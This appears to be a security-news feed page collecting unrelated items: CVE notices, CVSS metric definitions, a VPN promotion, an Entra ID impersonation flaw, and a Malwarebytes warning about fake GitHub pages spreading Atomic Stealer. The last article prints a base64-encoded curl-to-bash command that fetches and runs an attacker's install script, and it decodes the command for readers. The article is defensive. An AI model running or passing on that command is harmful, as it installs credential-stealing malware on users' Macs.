Binding to an unrestricted ip address in GitHub allows an unauthorized attacker to execute code over a network.

CVE-2025-55322: OmniParser Remote Code Execution Vulnerability

Libraesva has released a security update to address a vulnerability in its Email Security Gateway (ESG) solution that it said has been exploited by state-sponsored threat actors.
The vulnerability, tracked as CVE-2025-59689, carries a CVSS score of 6.1, indicating medium severity.
"Libraesva ESG is affected by a command injection flaw that can be triggered by a malicious email containing a

Vulnerability / Email Security

Libraesva has released a security update to address a vulnerability in its Email Security Gateway (ESG) solution that it said has been exploited by state-sponsored threat actors.

The vulnerability, tracked as **CVE-2025-59689**, carries a CVSS score of 6.1, indicating medium severity.

"Libraesva ESG is affected by a command injection flaw that can be triggered by a malicious email containing a specially crafted compressed attachment, allowing potential execution of arbitrary commands as a non-privileged user," Libraesva said in an advisory.

"This occurs due to an improper sanitization during the removal of active code from files contained in some compressed archive formats."

In a hypothetical attack scenario, an attacker could exploit the flaw by sending an email containing a specially crafted compressed archive, allowing a threat actor to leverage the application's improper sanitization logic to ultimately execute arbitrary shell commands.

The shortcoming affects Libraesva ESG versions 4.5 through 5.5.x before 5.5.7, with fixes released in 5.0.31, 5.1.20, 5.2.31, 5.3.16, 5.4.8, and 5.5.7. Libraesva noted in the alert that versions below 5.0 have reached end-of-support and must be manually upgraded to a supported release.

The Italian email security company also acknowledged that it has identified one confirmed incident of abuse, and that the threat actor is "believed to be a foreign hostile state entity." It did not share any further details on the nature of the activity, or who may be behind it.

"The single‑appliance focus underscores the precision of the threat actor (believed to be a foreign hostile state) and highlights the importance of rapid, comprehensive patch deployment," Libraesva said, adding it deployed a fix within 17 hours of flagging the abuse.

In light of active exploitation, it's essential that users of the ESG software update their instances to the latest version as soon as possible to mitigate potential threats.

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

State-Sponsored Hackers Exploiting Libraesva Email Security Gateway Vulnerability

A Insufficient Session Expiration vulnerability in the Liferay Portal 7.4.3.121 through 7.3.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.3, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, and 2024.Q1.1 through 2024.Q1.12 is allow an remote non-authenticated attacker to reuse old user session by SLO API.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-rpx3-f938-xj5q: Liferay Portal and DXP does not properly expire sessions

"RedNovember" is both lazy and punctual: always quick to do its homework on new vulnerabilities, but always getting the answers from cyber defenders.

Chinese APT Leans on Researcher PoCs to Spy on Other Countries

The Japanese government suffered the most cybersecurity incidents in 2024 — 447, nearly double the previous year — while failing to manage 16% of critical systems.

As Incidents Rise, Japanese Government's Cybersecurity Falls Short

Malwarebytes for Teams now includes personal VPN to encrypt your traffic and broaden your access across the web.

Running a small business today can hardly be done from a single device, a single location, or a single network.

Staying cybersecure is quite the same.

To extend the security and privacy of small business owners, no matter where you are, Malwarebytes for Teams now includes personal VPN access, for no additional cost, for all registered devices. Whether you’re typing up a draft on your tablet at a café, answering urgent emails from your smartphone at the airport, or just protecting your browsing activity on your laptop, connecting to a personal VPN provides that extra comfort that what you’re doing online is your business and your business only.

With a personal VPN you can:

*   Guard your online activity from prying eyes, whether on your laptop, smartphone, or tablet.
*   Access information, content, and resources that are typically restricted by location.
*   Maintain high speed connections for everything you do.

VPNs (Virtual Private Networks) have a bit of a dual reputation right now: They’re either IT tools that help multinational enterprises connect to corporate networks, or they’re covert programs that help paranoid privacy hawks slip by undetected online. The truth is that VPNs are for everyone, and that’s because what they offer is a benefit to all.

VPNs encrypt and protect your online traffic so that eavesdroppers can’t spy on your browsing behavior. This is useful both at public locations and in your office or home, because not all cyber snoops are hackers or criminals. In fact, some of the most active eavesdroppers are Internet Service Providers themselves, that sell consumer data for profit.

VPNs also provide a simple way to connect to an increasingly segmented internet. Despite the name, “the world wide web” can appear quite different when you travel to another country. The streaming platforms you enjoy at home can be blocked, their digital libraries can differ, and entirely benign resources can be gated behind separate laws. By connecting to any variety of servers through a VPN, you can access the internet you know and rely on, no matter your physical location.

It’s important to remember, however, that a VPN is just one part of a larger cybersecurity strategy. You still need to protect your small business’s devices from malware infections, rogue viruses, shady websites, and online scams.

For those threats, Malwarebytes for Teams also keeps you safe, especially when you’re mobile.  

Malwarebytes Scam Guard is available on iOS and Android

Malwarebytes Browser Guard is a free browser add-on that stops invasive ad trackers and flags dangerous websites connected to cybercriminal networks that are cleverly disguised to steal your information or infect your device. And for every other type of concerning message, email, link, or QR code, Malwarebytes Scam Guard for iOS and Android provides 24/7, AI-powered evaluations on who to trust, where to click, and what to ignore.

As every small business is unique, every security plan must adapt. Malwarebytes for Teams is proud to offer the security and privacy options that keep a modern mobile business safe online from hackers, scammers, and digital snoops.

 Malwarebytes for Teams now includes VPN 

Microsoft patched an Entra ID vulnerability that let attackers impersonate Global Admins across tenants, risking full Microsoft 365 and Azure takeover.

Microsoft has addressed a critical security vulnerability in Azure Entra ID, tracked as CVE-2025-55241, that was initially described as a low-impact privilege escalation bug. Security research later revealed the flaw was far more severe, allowing attackers to impersonate any user, including Global Administrators.

The vulnerability was originally identified by cybersecurity researcher Dirk-Jan Mollema while preparing for Black Hat and DEF CON presentations earlier this year. His findings showed that undocumented “Actor tokens,” combined with a validation failure in the legacy Azure AD Graph API, could be abused to impersonate any user in any Entra ID tenant, even a Global Administrator.

This meant a token generated in one lab tenant could grant administrative control over others, with no alerts or logs if only reading data, and limited traces if modifications were made.

The design of Actor tokens, as per Mollema, made the problem even worse. These tokens are issued for backend service-to-service communication and bypass normal security protections like Conditional Access. Once obtained, they allowed impersonation of other identities for 24 hours, during which no revocation was possible.

Microsoft applications could generate them with impersonation rights, but non-Microsoft apps would be denied that privilege. Because the Azure AD Graph API lacked logging, administrators would not see when attackers accessed user data, groups, roles, tenant settings, service principals, BitLocker keys, policies, etc.

In his detailed technical blog post, Mollema demonstrated that impersonation worked across tenants because the Azure AD Graph API failed to validate the token’s originating tenant. By changing the tenant ID and targeting a known user identifier (netId), he could move from his own tenant into any other.

With a valid netId of a Global Admin, the door opened to full takeover of Microsoft 365, Azure subscriptions, and connected services. Worse, netIds could be brute forced quickly, or in some cases, retrieved from guest account attributes in cross-tenant collaborations.

“The demo video shows how Actor tokens can be used within a single tenant, though the same method could have been applied across tenants through this vulnerability.”  

Microsoft rolled out a global fix on July 17, just three days after the initial report and later added further mitigations that block applications from requesting Actor tokens for the Azure AD Graph. The company said no evidence of exploitation was found in its internal telemetry. On September 4, the vulnerability was officially catalogued as CVE-2025-55241.

Security professionals, however, say the issue exposes broader concerns about trust in cloud identity systems. Anders Askasan, Director of Product at Radiant Logic, argued that “This incident shows how undocumented identity features can quietly bypass Zero Trust.”

_“_Actor tokens created a shadow backdoor with no policies, no logs, no visibility, undermining the very foundation of trust in the cloud. The takeaway is clear: vendor patching after the fact simply isn’t enough,” he added.

_“_To reduce systemic risk, enterprises need independent observability across their entire identity fabric, continuously correlating accounts, entitlements, and policies,_“_ he advised. “Organisations need a trusted, vendor-agnostic view of their identity data and controls, so they can validate in real time and act before an adversarial incursion escalates into a breach that’s almost impossible to unwind.”

Microsoft Fixed Entra ID Vulnerability Allowing Global Admin Impersonation

Fake software—including Malwarebytes and LastPass—is currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Fake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Unfortunately, Malwarebytes for Mac is one of them.

Impersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.

In this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.

The LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.

But in other, less obvious cases, you may see search results like these:

These only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.

The idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.

If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.

The terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.

Here’s a technical breakdown of the instructions provided to the visitor:

*   /bin/bash -c "<something>" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.
*   The part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.
*   $(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d) echo ... | base64 -d decodes the long string.
*   curl -fsSL is a command to download data from the web. The options mean:
    
    *   \-f: Fail silently for HTTP errors.-s: Silent mode (no progress bar).-S: Show errors if -s is used.
    
    *   \-L: Follow redirects.

So, putting all this together:

The inner command turns into: curl -fsSL https://gosreestr[.]com/hun/install.sh

The outer command becomes: /bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

So, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

The files to download have already been taken down, but users that recognize this chain of infection are under advice to thoroughly check their machines for an infection.

Impersonated software besides Malwarebytes and LastPass included:

*   1Password
*   ActiveCampaign
*   After Effects
*   Audacity
*   Auphonic
*   Basecamp
*   BetterSnapTool
*   Biteable
*   Bitpanda
*   Bitsgap
*   Blog2Social
*   Blue Wallet
*   Bonkbot
*   Carbon Copy Cloner
*   Charles Schwab
*   Citibank
*   CMC Markets
*   Confluence
*   Coolors
*   DaVinci Resolve
*   DefiLlama
*   Desktop Clockology
*   Desygner
*   Docker
*   Dropbox
*   E-TRADE
*   EigenLayer
*   Fidelity
*   Fliki
*   Freqtrade Bot
*   Freshworks
*   Gemini
*   GMGN AI
*   Gunbot
*   Hemingway Editor
*   HeyGen
*   Hootsuite
*   HTX
*   Hypertracker
*   IRS
*   KeyBank
*   Lightstream
*   Loopback
*   Maestro Bot
*   Melon
*   Metatrader 5
*   Metricool
*   Mixpanel
*   Mp3tag
*   Mural
*   NFT Creator
*   NotchNook
*   Notion
*   Obsidian
*   Onlypult
*   Pendle Finance
*   Pepperstone
*   Pipedrive
*   Plus500
*   Privnote
*   ProWritingAid
*   Publer
*   Raycast
*   Reaper
*   RecurPost
*   Renderforest
*   Rippling
*   Riverside.fm
*   Robinhood
*   Rug AI
*   Sage Intacct
*   Salesloft
*   SentinelOne
*   Shippo
*   Shopify
*   SocialPilot
*   Soundtrap
*   StreamYard
*   SurferSEO
*   Thunderbird
*   TweetDeck
*   Uphold
*   Veeva CRM
*   Viraltag
*   VSCO
*   Vyond
*   Webull
*   Xai Games
*   XSplit
*   Zealy
*   Zencastr
*   Zenefits
*   Zotero

But it’s highly likely that there will be more, so don’t see this as an exhaustive list.

**How to stay safe**

Both ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:

*   Never run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.
*   Always download software from the official developer pages. If they do not host it themselves, verify the download links with them.
*   Avoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.
*   Use real-time anti-malware protection, preferably one that includes a web protection component.

If you have scanned your Mac and found the information stealer:

*   Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
*   If any signs of persistent backdoor or unusual activity remain, strongly consider a **full clean reinstall of macOS** to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
*   After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
*   Change all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.
*   If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team are happy to assist you if you have any concerns.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Fake Malwarebytes, LastPass, and others on GitHub serve malware 

GitHub will address weak authentication and overly permissive tokens in the NPM ecosystem, following high-profile threat campaigns like those involving Shai-Hulud malware.

GitHub Aims to Secure Supply Chain as NPM Hacks Ramp Up

The for-hire platform leverages legitimate cloud-native tools to make detection and disruption harder for defenders and SOC analysts.

Latest News